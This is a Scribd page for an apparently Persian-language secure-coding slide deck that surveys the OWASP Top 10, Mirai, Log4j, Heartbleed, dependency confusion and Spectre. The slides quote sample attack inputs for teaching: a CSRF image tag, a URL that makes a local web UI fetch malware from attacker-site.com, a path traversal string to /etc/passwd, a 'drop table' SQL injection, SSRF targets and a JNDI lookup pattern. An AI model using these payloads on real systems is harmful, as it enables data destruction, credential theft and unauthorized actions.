Scribd
Upload
25 views

Secure Coding

The document discusses various software vulnerabilities and security issues that can allow hacking or exploitation of systems and applications. It covers topics like broken access control, injection flaws, insecure design choices, use of outdated or vulnerable components, cryptographic failures, hard-coded credentials, and specific vulnerabilities like Log4j, Heartbleed, Spectre, and Meltdown. The document emphasizes that while some vulnerabilities are outside a developer's control, application security is generally a shared responsibility between developers and security experts, and even applications without sensitive data should still consider security.

Uploaded by

Mohsen Ashrafi
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
25 views

Secure Coding

The document discusses various software vulnerabilities and security issues that can allow hacking or exploitation of systems and applications. It covers topics like broken access control, injection flaws, insecure design choices, use of outdated or vulnerable components, cryptographic failures, hard-coded credentials, and specific vulnerabilities like Log4j, Heartbleed, Spectre, and Meltdown. The document emphasizes that while some vulnerabilities are outside a developer's control, application security is generally a shared responsibility between developers and security experts, and even applications without sensitive data should still consider security.

Uploaded by

Mohsen Ashrafi
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 38

‫ﭼطوری ﺑرﻧﺎﻣﮫای ﺑﻧوﯾﺳﯾم ﮐﮫ ھﮏ ﺑﺷﮫ؟‬

‫ﺻﺎﻟﺢ ﺧزاﻋﯽ‬
‫ھﮏ ﻧﺷدن از ﮐﮫ آﻣوﺧﺗﯽ؟ از ھﮑرھﺎ!‬
OWASP Top 10
Broken Access Control

94%
Broken Access Control
Broken Access Control
Broken Access Control
Broken Access Control
<img src="http://example.com/transfer/1234/1000000" width="0" height=
"0" border="0">
Broken Access Control

http://localhost:8080/gui/?action=add-url&s=http://attacker-site.com/malware

http://localhost:8080/gui/?action=setsetting&s=webui.password&v=newpassword
Broken Access Control
Broken Access Control

Filename=../../../../../../etc/passwd
Bruthforce!
Injection

94%
Injection

Name: ‘; drop table users; --


Query: select id from users where name = ‘‘; drop table users; --’
Injection
- All of the databases (NoSQL, SQL) e.g.: Elasticsearch, Cassandra, MySQL,
PostgreSQL
- OS Command
- LDAP
Insecure Design
• Table users:
• ID
• Username
• Password
Insecure Design
• Table users:
• ID
• Username
• Password -> hash(Password)

• Sensitive information
• Correctness check, Existence -> Hash
• View -> Masking
• If we really need them -> Encryption
Vulnerable and Outdated Components
Server-Side Request Forgery (SSRF)
Server-Side Request Forgery (SSRF)

file:///etc/passwd
http://localhost:8080
http://wontevercloseconnection.xyz
Cryptographic Failures
Hard-coded credentials
‫ﺑزرﮔﺗرﯾن ﺧراﺑﮑﺎری ھﺎی ﺑرﻧﺎﻣﮫ ﻧوﯾﺳﺎن ☺‬
Mirai Botnet
Mirai botnet
• ARC Processor
• Default Username & Password
• baby monitors, vehicles, network routers,
agricultural devices, medical devices,
environmental monitoring devices, home
appliances, DVRs, CC cameras, headset, or
smoke detectors.
• 100,000 in an attack to Dyn DNS provider
Log4j Vulnerability
Log4j Vulnerability
• Log.info("${user.username} not found")
• Remote lookup: LDAP, DNS, Java Remote Method
Invocation (RMI)
• ${ jndi:protocol://server}. ${}
Log4j attack
Heart Bleed
Heart Bleed
Heart Bleed
Dependency Confusion

Apple, Microsoft, Shopify, Paypal, Netflix, Yelp, Uber


Dependency Confusion
Dependency Confusion
Dependency Confusion
• pip install library
• Checks whether library exists on the specified (internal) package index
• Checks whether library exists on the public package index (PyPI)
• Installs whichever version is found. If the package exists on both, it
defaults to installing from the source with the higher version number.
‫‪Spectre‬‬

‫‪Meltdown‬‬

‫اﯾن ﯾﮑﯽ ﺗﻘﺻﯾر ﺑرﻧﺎﻣﮫ ﻧوﯾس ھﺎ ﻧﺑود!‬


Spectre - Speculative execution
CPU Memory
Spectre - Speculative execution
arr := [1]int{0}
X := 10000
If x < 1 { // mig mig …
y = array[x] // cached in CPU
// oops! reverting! but not it’s effect on cache
}
Do a CPU cache side-channel attack and read the cache!
BOOM, we can now read all of the RAM
‫ﻣﺳﺋوﻟﯾت اﻣﻧﯾت ﻧرم اﻓزار ﺑﺎ ﭼﮫ ﮐﺳﯽ اﺳت؟‬
‫ﺑرﻧﺎﻣﮫ ﻧوﯾس ﯾﺎ ﮐﺎرﺷﻧﺎس اﻣﻧﯾت؟‬

‫ﻣن در ﺣﺎل ﺗوﺳﻌﮫ ﻧرم اﻓزاری ھﺳﺗم ﮐﮫ داده ﻣﮭﻣﯽ ﻧداره‪ ،‬آﯾﺎ ﺑﺎﯾد ﺑرای‬
‫اﻣﻧﯾﺗش وﻗت ﺑذارم؟‬

You might also like